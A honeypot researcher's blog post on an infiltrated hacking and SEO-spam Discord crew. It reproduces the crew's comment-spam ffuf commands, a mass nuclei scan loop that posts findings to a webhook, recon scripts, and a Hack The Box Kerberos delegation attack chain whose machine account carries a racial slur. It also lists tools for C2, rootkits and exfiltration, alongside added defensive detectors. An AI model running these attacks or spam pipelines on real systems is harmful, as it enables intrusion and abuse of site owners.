Ukrainian Honeypot ::009:: Crew ::001:: chakal1337 // “Skidson Mafia” // Hacking/Blackhat SEO Discord Servers

Last Updated

Mon Oct 9 18:54:14 2023

See Also

(all are still regularly updated as of roughly the above date; I apologize for any organizational issues and the raw nature of this data: there’s a lot to manage and a lot coming in while I’m still trying to analyze it manually, to a certain degree, and monitor services; I also have a disorganized mess of a mind)


stream = [('in', b'POST /wp-comments-post.php HTTP/1.1\x0d\x0aHost: ##bcable-redacted##\x0d\x0aUser-Agent: Mozilla/5.0 +(##redacted-user##)\x0d\x0aReferer: https://##redacted-site##/\x0d\x0aConnection: close\x0d\x0aContent-Type: application/x-www-form-urlencoded\x0d\x0aContent-Length: 200\x0d\x0a\x0d\x0acomment=##redacted-user##+https://##redacted-site##/&author=##redacted-user##&'),


I randomly tracked the following redacted log down to a Discord invite, then “socially engineered” my way into the chat. Inside the initial “halt, who goes there” access-restriction landing channel, there was a bunch of chatting happening between hackers ranging from very skilled to very inexperienced, totalling about 20 people. I ignored most of it; it wasn’t really relevant, since it was mostly just exchanging racist nonsense. There was plenty of interesting code to analyze, though, including the actual code that was used to spam this exact URL to my honeypot:

“[11/16/2022 5:26 AM] Get top1m lists (and example to search for wp-comments-post.php):”

wget -c
cd top-1m.csv
cat top-1m.csv | sed -e "s/.*,//g" > top1m.txt
for i in $(cat top1m.txt); do echo https://$i/ >> top1mhttp.txt; done
cat top1mhttp.txt | head -n 100000 > top100k.txt
ffuf -w top100k.txt -u FUZZ -mc 200 -o workinghttp.txt
cat workinghttp.txt | jq .results[].url | tr -d '"' | sort -u | uniq >top1mworkinghttp.txt
ffuf -u FUZZ/wp-comments-post.php -w top1mworkinghttp.txt -mc 405 -o wp-comments-post.json
cat wp-comments-post.json | jq .results[].url | tr -d '"' >wp-comments-post.txt

“[11/16/2022 5:27 AM] Screen quick cheatsheet:”

screen -S session_name - create session
CTRL+A CTRL+D - detach
screen -list - list
screen -r session_name - reattach
CTRL+A K y - kill
CTRL+A ESC - scroll mode (q or esc to exit)

“Making backlinks with ffuf”

ffuf -u FUZZ -w wp-comments-post.txt -H "Content-Type: application/x-www-form-urlencoded" -H "Referer:" -d "comment=hello+world&author=hey&" -H "User-Agent: Mozilla/5.0 (Firefox)"

Very interesting to see the script(s) that were used to actually hit my server. I don’t think this “crew” actually did the attack itself; they advertise this code to be used by anyone, essentially. Otherwise there wouldn’t be instructions on how to use something as simple as GNU screen. I’ve heard of similar groups that operate mostly out of Bangladesh, but this group mostly spoke Portuguese, it seemed.

I’ll reiterate that US intelligence, whether true or not, keeps accusing China of posing as Brazilian hackers. I seem to be finding a lot of “Brazilian hackers” or at least those who fit that profile. Later analysis suggests these people might have been Serbian or Chechen hackers, but it’s very hard to attribute.
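
From the defender’s side, the request shape above (a POST to wp-comments-post.php carrying a URL in the comment, the author name echoed in the User-Agent, a Referer pointing at the spammed site) and the bare GET the crew uses to fingerprint WordPress installs by the 405 response can be flagged straight from captured requests. The detector below is an added example, not code from this post or from the crew; the sample requests are constructed, and the indicator list and the check for WordPress’s hidden comment_post_ID form field are the editor’s choices.

```python
import re
from urllib.parse import parse_qs, urlsplit

COMMENT_ENDPOINT = "/wp-comments-post.php"
URL_RE = re.compile(r"https?://[^\s&]+", re.I)

def parse_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, target, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()  # "Referer:" -> ""
    return method, target, headers, body.decode("latin-1")

def spam_indicators(raw: bytes):
    """Indicators that a request to the comment endpoint is mass comment spam
    or fingerprinting; [] for an ordinary comment or for any other path."""
    method, target, headers, body = parse_request(raw)
    if target.split("?", 1)[0] != COMMENT_ENDPOINT:
        return []
    if method == "GET":
        # Browsers only POST the comment form. A bare GET matches the crew's
        # "-mc 405" fingerprinting step: WordPress answers GET here with 405.
        return ["GET to comment endpoint (fingerprinting probe)"]
    form = parse_qs(body, keep_blank_values=True)
    comment = form.get("comment", [""])[0]
    author = form.get("author", [""])[0]
    ua = headers.get("user-agent", "")
    referer = headers.get("referer", "")
    host = headers.get("host", "").split(":")[0]
    reasons = []
    if URL_RE.search(comment):
        reasons.append("comment body carries a URL")
    if not referer:
        reasons.append("empty or missing Referer")
    elif urlsplit(referer).hostname != host:
        reasons.append("Referer host differs from Host header")
    if author and author in ua:
        reasons.append("author name repeated inside User-Agent")
    if "fuzz faster u fool" in ua.lower():   # ffuf's default User-Agent
        reasons.append("ffuf default User-Agent")
    if "comment_post_ID" not in form:        # hidden field every real comment form posts
        reasons.append("no comment_post_ID field")
    return reasons

# Constructed sample requests (not real traffic). SPAM mirrors the shape of the
# redacted honeypot log above; LEGIT is an ordinary comment; PROBE is the GET check.
SPAM = (b"POST /wp-comments-post.php HTTP/1.1\r\nHost: honeypot.example\r\n"
        b"User-Agent: Mozilla/5.0 +(spamname)\r\nReferer: https://spam.example/\r\n"
        b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 55\r\n"
        b"\r\ncomment=spamname+https://spam.example/&author=spamname&")
LEGIT = (b"POST /wp-comments-post.php HTTP/1.1\r\nHost: honeypot.example\r\n"
         b"User-Agent: Mozilla/5.0 (X11; Linux x86_64) Firefox/118.0\r\n"
         b"Referer: https://honeypot.example/2023/10/some-post/\r\n"
         b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 51\r\n"
         b"\r\ncomment=Nice+write-up&author=ann&comment_post_ID=12")
PROBE = b"GET /wp-comments-post.php HTTP/1.1\r\nHost: honeypot.example\r\n\r\n"

for _label, _req in (("spam", SPAM), ("legit", LEGIT), ("probe", PROBE)):
    print(_label, spam_indicators(_req))
```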

Another Project

Here is another project, which seems to scan mass targets and post the results to a generic JSON webhook. It takes targets from HackerOne datasets and uses nuclei to attempt to exploit them, so the targets should be acceptable ones.


import json
import requests
import random

url = ""
r = requests.get(url=url)
fullz = []
datas = json.loads(r.text)
for data in datas:
 if not "targets" in data: continue
 for target in data["targets"]["in_scope"]:
  if not target["asset_identifier"].startswith("*."): continue
  if not target["eligible_for_bounty"] == True: continue
  if not target["eligible_for_submission"] == True: continue
  fullz.append(target["asset_identifier"].replace("*.", ""))


getallscope | shuf | head -n 10 | assetfinder -subs-only > tmpfile


rm probed;
rm foundvuln.txt;
rm tmpfile;
cat tmpfile | shuf | httprobe -c 100 | tee -a probed;
nuclei -as -silent -s medium,high,critical -nc -l probed | xargs -L 1 sendwebhook | tee -a foundvuln.txt;

/usr/bin/sendwebhook (change webhook url to yours)

argstr=$(echo $argstr | tr -d '"');
echo $argstr;
curl WEBHOOK_URL_HERE -H "Content-Type: application/json" --data "{\"name\":\"hello\", \"content\":\"$argstr\"}";
sleep 2;


while true; do 

“and finally run this command then exit out of your vps and wait for bugs to pop in your discord channel”

nohup pwnforever &

“remember to chmod +x every script”
“and install assetfinder, nuclei, httprobe”
“(they’re in kali’s repositories just apt install)”

“takes urls from stdin and prints only the ones with unique parameter names”

import sys

# reads URLs from stdin and prints only those whose path + parameter-name set
# has not been seen before (parameter values are ignored)
urlparamlist = []

def getpath(url):
 if not "://" in url: return ""
 urll = url.split("://")[1]
 urll = "/".join(urll.split("/")[1:])
 if "?" in urll: urll = urll.split("?")[0]
 return urll

def alreadyparam(url):
 global urlparamlist
 paramsfull = ""
 urlparams = url.split("?")
 if len(urlparams) > 1:
  urlparams = urlparams[1]
 else:
  urlparams = ""
 paramsfull += getpath(url)
 for urlparam in urlparams.split("&"):
  if not "=" in urlparam: continue
  else: urlparam = urlparam.split("=")[0]
  paramsfull += "{}".format(urlparam)
 if not paramsfull in urlparamlist:
  urlparamlist.append(paramsfull)
  return 0
 return 1

for url in sys.stdin:
 url = url.strip()
 if not alreadyparam(url):
  print(url)


cat all_urls.txt | python > unique_param.txt

grabipranges (JS)

function grabipranges() {
 full = "";
 var links = document.getElementsByTagName("a");
 for(let i = 0; i < links.length; i++) {
  if(!links[i].href) continue;
  if(links[i].href.indexOf("/prefix/") == -1) continue;
  if(links[i].href.indexOf("::") !== -1) continue;
  full += links[i].href.split("prefix/")[1] + " ";

“little script to grab all ip ranges from”

Auto-Scan Script

if [[ $# < 1 ]]; then
 echo "$0 <domain>";
 exit 1;
fi
echo "Checking dependencies...";
if ! which assetfinder &>/dev/null;  then
 sudo apt install assetfinder;
fi
if ! which getallurls &>/dev/null;  then
 sudo apt install getallurls;
fi
if ! which nmap &>/dev/null;  then
 sudo apt install nmap;
fi
if ! which httprobe &>/dev/null;  then
 sudo apt install nmap;  # sic: the posted script installs nmap here rather than httprobe
fi
if ! which dirsearch &>/dev/null; then
 sudo apt install dirsearch;
fi
echo "Cleaning up previous scan files...";
rm assetsfound.txt &>/dev/null;
rm all_urls.txt &>/dev/null;
rm nmap-scan.txt &>/dev/null;
rm assetsworking.txt &>/dev/null;
rm dirsearched.txt &>/dev/null;
rm customwordlist.txt &>/dev/null;
echo "Starting..";
echo "Running assetfinder...";
assetfinder -subs-only $1 | tee -a assetsfound.txt;
echo "Cleaning up asset list...";
cat assetsfound.txt | sort -u | uniq > assetsfoundt.txt;
mv assetsfoundt.txt assetsfound.txt;
echo "Probing for working http servers...";
cat assetsfound.txt | httprobe | tee -a assetsworking.txt;
echo "Cleaning working assets list...";
cat assetsworking.txt | sort -u | uniq > assetsworkingt.txt;
mv assetsworkingt.txt assetsworking.txt;
echo "Creating custom wordlist...";
for i in $(cat assetsworking.txt); do curl $i --output - | sed -e "s/\s/\n/g" | tr "[:cntrl:][:punct:]" "\n" | tr -s "[:cntrl:]" "\n" >>customwordlist.txt; done;
echo "Cleaning custom wordlist...";
cat customwordlist.txt | sort -u | uniq > customwordlistt.txt;
mv customwordlistt.txt customwordlist.txt;
echo "Running getallurls...";
for i in $(cat assetsworking.txt); do getallurls $i | tee -a all_urls.txt; done;
echo "Running nmap...";
nmap -sT -Pn -T5 -vv -n -iL assetsfound.txt -oN nmap-scan.txt;
echo "Running dirsearch...";
cp assetsworking.txt /tmp/assetsworking.txt;
dirsearch -l /tmp/assetsworking.txt -o /tmp/dirsearched.txt;
rm /tmp/assetsworking.txt;
mv /tmp/dirsearched.txt dirsearched.txt;
echo "Running dirsearch with the custom wordlist...";
cp assetsworking.txt /tmp/assetsworking.txt;
cp customwordlist.txt /tmp/customwordlist.txt;
dirsearch -l /tmp/assetsworking.txt -o /tmp/dirsearched.txt -w /tmp/customwordlist.txt;
rm /tmp/assetsworking.txt;
rm /tmp/customwordlist.txt;
mv /tmp/dirsearched.txt dirsearched_customlist.txt;
echo "All done!";

import sys

urlparamlist = []

def getpath(url):
 if not "://" in url: return ""
 urll = url.split("://")[1]
 urll = "/".join(urll.split("/")[1:])
 if "?" in urll: urll = urll.split("?")[0]
 return urll

def getbase(url):
 schema = url.split("://")[0]
 url = url.split("://")[1]
 if "/" in url: url = url.split("/")[0]
 fullurl = "{}://{}/".format(schema, url)
 return fullurl

def alreadyparam(url):
 global urlparamlist
 paramsfull = ""
 urlparams = url.split("?")
 if len(urlparams) > 1:
  urlparams = urlparams[1]
  urlparams = ""
 paramsfull += getpath(url)+"?"
 for urlparam in urlparams.split("&"):
  if not "=" in urlparam: continue
  else: urlparam = urlparam.split("=")[0]
  paramsfull += "{}={}&".format(urlparam, sys.argv[1])
 paramsfull = "&".join(paramsfull.split("&")[:-1])
 if not paramsfull in urlparamlist:
  return 0
  return 1

for url in sys.stdin:
 url = url.strip()

“generate custom wordlist from cewl output”

cat cewld.txt | python3 > generated.txt
import sys

words = []

for line in sys.stdin:

def mk(lower=False):
 for word in words:
  for word2 in words:
   if word == word2: continue
   if lower == True:
    word = word.lower()
    word2 = word2.lower()
   print("{}{}".format(word, word2))
   print("{}-{}".format(word, word2))
   print("{}.{}".format(word, word2))
   print("{}_{}".format(word, word2))

words = list(set(words))

Other Logs Provided

These I believe are logs of their CTF challenge successes.

Nmap scan report for
Host is up, received user-set (0.093s latency).
Scanned at 2022-10-31 15:18:34 EDT for 61s
Not shown: 989 filtered tcp ports (no-response)
53/tcp   open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2022-10-31 19:18:49Z)
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 127
464/tcp  open  kpasswd5?     syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack ttl 127
3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped    syn-ack ttl 127
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 0s
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 46499/tcp): CLEAN (Timeout)
|   Check 2 (port 19493/tcp): CLEAN (Timeout)
|   Check 3 (port 45724/udp): CLEAN (Timeout)
|   Check 4 (port 55678/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2022-10-31T19:18:57
|_  start_date: N/A

88/tcp open  kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
|     guest@support.htb
|_    administrator@support.htb

SMB  445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
SMB  445    DC               [+] support.htb\guest:
SMB  445    DC               [+] Enumerated shares
SMB  445    DC               Share           Permissions     Remark
SMB  445    DC               -----           -----------     ------
SMB  445    DC               ADMIN$                          Remote Admin
SMB  445    DC               C$                              Default share
SMB  445    DC               IPC$            READ            Remote IPC
SMB  445    DC               NETLOGON                        Logon server share
SMB  445    DC               support-tools   READ            support staff tools
SMB  445    DC               SYSVOL                          Logon server share


[System Access]
MinimumPasswordAge = 1
MaximumPasswordAge = -1
MinimumPasswordLength = 7
PasswordComplexity = 1
PasswordHistorySize = 24
LockoutBadCount = 0
RequireLogonToChangePassword = 0
ForceLogoffWhenHourExpire = 0
ClearTextPassword = 0
LSAAnonymousNameLookup = 0
[Kerberos Policy]
MaxTicketAge = 10
MaxRenewAge = 7
MaxServiceAge = 600
MaxClockSkew = 5
TicketValidateClient = 1
[Registry Values]
[Privilege Rights]
SeAssignPrimaryTokenPrivilege = *S-1-5-20,*S-1-5-19
SeAuditPrivilege = *S-1-5-20,*S-1-5-19
SeBackupPrivilege = *S-1-5-32-549,*S-1-5-32-551,*S-1-5-32-544
SeBatchLogonRight = *S-1-5-32-559,*S-1-5-32-551,*S-1-5-32-544
SeChangeNotifyPrivilege = *S-1-5-32-554,*S-1-5-11,*S-1-5-32-544,*S-1-5-20,*S-1-5-19,*S-1-1-0
SeCreatePagefilePrivilege = *S-1-5-32-544
SeDebugPrivilege = *S-1-5-32-544
SeIncreaseBasePriorityPrivilege = *S-1-5-90-0,*S-1-5-32-544
SeIncreaseQuotaPrivilege = *S-1-5-32-544,*S-1-5-20,*S-1-5-19
SeInteractiveLogonRight = *S-1-5-9,*S-1-5-32-550,*S-1-5-32-549,*S-1-5-32-548,*S-1-5-32-551,*S-1-5-32-544
SeLoadDriverPrivilege = *S-1-5-32-550,*S-1-5-32-544
SeMachineAccountPrivilege = *S-1-5-11
SeNetworkLogonRight = *S-1-5-32-554,*S-1-5-9,*S-1-5-11,*S-1-5-32-544,*S-1-1-0
SeProfileSingleProcessPrivilege = *S-1-5-32-544
SeRemoteShutdownPrivilege = *S-1-5-32-549,*S-1-5-32-544
SeRestorePrivilege = *S-1-5-32-549,*S-1-5-32-551,*S-1-5-32-544
SeSecurityPrivilege = *S-1-5-32-544
SeShutdownPrivilege = *S-1-5-32-550,*S-1-5-32-549,*S-1-5-32-551,*S-1-5-32-544
SeSystemEnvironmentPrivilege = *S-1-5-32-544
SeSystemProfilePrivilege = *S-1-5-80-3139157870-2983391045-3678747466-658725712-1809340420,*S-1-5-32-544
SeSystemTimePrivilege = *S-1-5-32-549,*S-1-5-32-544,*S-1-5-19
SeTakeOwnershipPrivilege = *S-1-5-32-544
SeUndockPrivilege = *S-1-5-32-544
SeEnableDelegationPrivilege = *S-1-5-32-544



evil-winrm -i -u support


New-MachineAccount -MachineAccount "NIGGER" -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose

Set-ADComputer "DC" -PrincipalsAllowedToDelegateToAccount "NIGGER$"

.\Rubeus.exe  hash /password:123456 /user:NIGGER$ /domain:support.htb


impacket-getST support.htb/NIGGER$ -spn http/ -aesKey 52BB4083984059E72EEFD69D56412220 -impersonate administrator -dc-ip

export KRB5CCNAME=administrator.ccache

impacket-psexec support.htb/ -k -no-pass
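
The chain above rests on two things visible in the policy export: SeMachineAccountPrivilege granted to S-1-5-11 (Authenticated Users), which lets any domain user create the machine account, and the ability to write msDS-AllowedToActOnBehalfOfOtherIdentity on the DC’s computer object. Both leave traces a defender can correlate: Security event 4741 (computer account created) and 5136 (directory object modified, with the attribute named in AttributeLDAPDisplayName). The script below is an added example, not from the post or the crew; the events, the policy excerpt and the ADMIN_SUBJECTS allow-list are constructed.

```python
from collections import defaultdict

EVENT_COMPUTER_CREATED = 4741     # Security: a computer account was created
EVENT_DS_OBJECT_MODIFIED = 5136   # Security: a directory service object was modified
RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"
ADMIN_SUBJECTS = {"Administrator"}  # constructed allow-list of accounts expected to join machines

def policy_findings(inf_text):
    """Flag settings in a secedit-style export that make the chain possible."""
    settings = {}
    for line in inf_text.splitlines():
        key, sep, value = line.partition("=")
        if sep and not line.startswith("["):
            settings[key.strip()] = value.strip()
    findings = []
    if "S-1-5-11" in settings.get("SeMachineAccountPrivilege", ""):
        findings.append("Authenticated Users (S-1-5-11) hold SeMachineAccountPrivilege")
    if settings.get("LockoutBadCount") == "0":
        findings.append("LockoutBadCount = 0: no lockout threshold, spraying goes unthrottled")
    return findings

def detect_rbcd(events):
    """Correlate 4741 and 5136 events into (time, severity, message) alerts.
    Events are dicts keyed by the Security log's own field names."""
    created_by = defaultdict(set)   # subject -> machine accounts it created
    alerts = []
    for ev in events:
        subj = ev["SubjectUserName"]
        if ev["EventID"] == EVENT_COMPUTER_CREATED:
            created_by[subj].add(ev["TargetUserName"])
            if subj not in ADMIN_SUBJECTS:
                alerts.append((ev["TimeCreated"], "medium",
                               f"{subj} created machine account {ev['TargetUserName']}"))
        elif (ev["EventID"] == EVENT_DS_OBJECT_MODIFIED
              and ev.get("AttributeLDAPDisplayName") == RBCD_ATTR):
            dn = ev["ObjectDN"]
            # a delegation write on a DC object is the RBCD-to-DA path shown above
            severity = "critical" if "OU=Domain Controllers" in dn else "high"
            msg = f"{subj} wrote {RBCD_ATTR} on {dn}"
            if created_by[subj]:
                msg += f"; same subject created {sorted(created_by[subj])}"
            alerts.append((ev["TimeCreated"], severity, msg))
    return alerts

# Constructed sample data (not real logs); the policy lines mirror the export above.
POLICY = """[System Access]
LockoutBadCount = 0
[Privilege Rights]
SeMachineAccountPrivilege = *S-1-5-11
SeEnableDelegationPrivilege = *S-1-5-32-544
"""
EVENTS = [
    {"TimeCreated": "2022-10-31T19:40:01Z", "EventID": 4741,
     "SubjectUserName": "support", "TargetUserName": "ROGUEPC$"},
    {"TimeCreated": "2022-10-31T19:40:30Z", "EventID": 5136,
     "SubjectUserName": "support", "ObjectClass": "computer",
     "ObjectDN": "CN=DC,OU=Domain Controllers,DC=support,DC=htb",
     "AttributeLDAPDisplayName": RBCD_ATTR, "OperationType": "%%14674"},
    {"TimeCreated": "2022-10-31T20:05:12Z", "EventID": 5136,
     "SubjectUserName": "Administrator", "ObjectClass": "computer",
     "ObjectDN": "CN=WS01,CN=Computers,DC=support,DC=htb",
     "AttributeLDAPDisplayName": "description", "OperationType": "%%14674"},
    {"TimeCreated": "2022-10-31T20:06:00Z", "EventID": 4741,
     "SubjectUserName": "Administrator", "TargetUserName": "WS02$"},
]

if __name__ == "__main__":
    print(policy_findings(POLICY))
    for alert in detect_rbcd(EVENTS):
        print(*alert)
```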


Other Tricks

kali i3

how to get

[img of i3 for kali]

- sudo apt install i3
- sudo update-alternatives --config x-session-manager
- select i3
- reboot

Interesting idea, but for most people kali is best as a LiveCD that can be destroyed, and i3/sway are best with my own config personally. Also, a reboot is not necessary since you can just execute systemctl restart lightdm.

Discord Unicode Usernames

Apparently using the control code \x0a as a username would be accepted by Discord (UPDATE: not true anymore), but makes a blank username. This was used by a non-core member of said crew.

Tools List Provided

Web App Tools

dirsearch - best directory busting tool
ffuf - the best http fuzzing tool
httprobe - check alive http servers from a large list
gospider - crawling webservers
assetfinder - passive asset discovery
getallurls - passive url discovery
amass - multi use passive enumeration tool
meg - request many paths in many hosts (like round robin directory busting)
sqlmap - the best sql injection tool
tplmap - like sqlmap but for server side template injection
burpsuite - highly extensible http(s) proxy, includes a lot of useful tools, it's a must-have
nuclei - an actually good automated scanner (like nessus but specialized for web apps and 10x better)
git-dumper - dump exposed .git directories

Online Tools

[link] - mess with various data formats and encodings (great tool)
[link] - check availability of hosts, tcp and udp ports, ping, geolocation and more
[link] - bgp tools
[link] - even more bgp tools
[link] - service to find passwords from breaches
[link] - whois history, reverse whois and other whois tools

Windows Tools

crackmapexec - password spraying and service enumeration for many protocols
impacket-getTGT - get kerberos ticket granting ticket to use with other tools
impacket-smbclient - (better) smb client
impacket-psexec - create and run psexec service
impacket-wmiexec - run commands over wmi
impacket-smbexec - execute commands over smb
DonPAPI - dump credentials from dpapi
evil-winrm - windows remoting
bloodhound - visualize active directory attack paths
responder - respond to and poison various windows protocols to grab authentication
WinPeas - windows privilege escalation tool (like linpeas)
powersploit - windows powershell post exploitation module
rubeus - kerberos multi tool
sysinternals - a suite of tools for windows administration

Network Tools

masscan - fast port scanner (async, single syn packet)
zmap - another fast port scanner (async, single syn packet)
nmap - the best port scanning tool with scripting capabilities and accurate service detection
netcat - easily build tcp or udp connections and quick shells
chisel - create socks, http and udp tunnels over http

Linux Tools:

linpeas - privilege escalation and info gathering script, works every time (ok, 99% of the time)
linenum - run this if linpeas doesn't give you the sauce
diamorphine - kernel rootkit for process hiding

C2 Tools

powershell-empire - c2/post exploitation framework with agents written in powershell (for windows) and python (for linux)
cobalt strike - c2 framework with a lot of AD capabilities built in to the agent
Quasar RAT - open source windows "remote administration" tool
AsyncRAT - open source windows "remote administration" tool
mirai/qbot - ddos c2 for linux
perlbot - irc based c2 for linux

Exfiltration Tools

rsync - transfer or synchronize files fast
rclone - upload content to the cloud fast
scp/sftp - upload over ssh tunnel
ftp - upload files over ftp
smbclient - upload files over smb


Google - the most powerful of them all..
[link] - searches a username on countless social media sites and prints matches
maltego - visualize open source data points as a graph and apply transforms to extend them
exiftool - extract exif metadata from files

Password Tools

hashcat - fast hash cracker
john - another fast hash cracker
hydra - fast bruteforcer that supports many protocols
[link] - generate wordlist from a folder of files and documents belonging to the target user
cupp - generate common user passwords and mutations from a wordlist or interactive prompt

Exploitation Tools:

metasploit - probably the best exploitation framework ever made
armitage - multiplayer red team with a gui frontend for metasploit (it's open source cobalt strike..)
BlackHole - leaked browser exploit kit
BleedingLife - leaked browser exploit kit
CrimePack - leaked browser exploit kit
searchsploit - searches exploitdb from the command line

SEO/Spam Tools

Scrapebox - scrape links and keywords, emails, pr and much more from search engines, post comments, pingbacks, trackbacks.. swiss army knife of SEO
XRumer - amazing forum spamming tool that's been around for more than a decade and still being actively developed
Xevil - ocr tool that can decode pretty much any captcha in milliseconds, comes with xrumer
allsubmitter - russian multi spam tool
gsa search engine ranker - another good backlink tool
grum - leaked email spam botnet c2
phplist - open source mailing list software
exim - mail transfer agent
postfix - mail transfer agent

Reverse Engineering

x64dbg - great graphical debugger
ollydbg - windows 32 bit graphical debugger
immunitydebugger - a graphical debugger extensible with python
gdb - gnu debugger
pwndbg - pwn extensions for gdb
edb - a graphical debugger for linux
WinDBG - NT OS kernel and userland debugger
IDA - decompiler, debugger and code analysis tool
ghidra - decompiler, debugger and code analysis tool
cheatengine - a tool for developing game hacks that's also really useful for reverse engineering

Binary Exploitation

pwntools - full fledged pwn framework with lots of tools to make exploit development easier
rop-tool - tool for finding rop gadgets
checksec - check which mitigations are enabled on a binary
afl - fast brute force fuzzer with instrumentation
spike - network protocol fuzzer
msfvenom - easily generate shellcode using metasploit framework templates

Message Monitoring

Not a whole lot other than racist and pro-Russian content. One interesting thing I noticed was that the old-style “1337-speak” is no longer a thing, and broken English is not really a thing as much either. It was mostly memes and taking on personas. Some people took on the persona of Pokimane (chakal1337), some Serena Williams (not in a good way), others Al Pacino (Scarface); impersonating well-known influencers was a common tactic. This made for very expressive, “reactive” people who were easily memeable and easy to communicate with via GIFs. The way I stayed on was adopting an identity of my own, and I will keep that identity to myself.

Eventually a link was posted to which provided a ton of other DNS entries.

Description provided of features:

- Page for search engine
- Redirect humans to location
- Custom title & description
- Multiple high DA domains
- Unlimited traffic
- 1% skim

Samples of Chat:

These are some of the more sanitized chat/meme examples: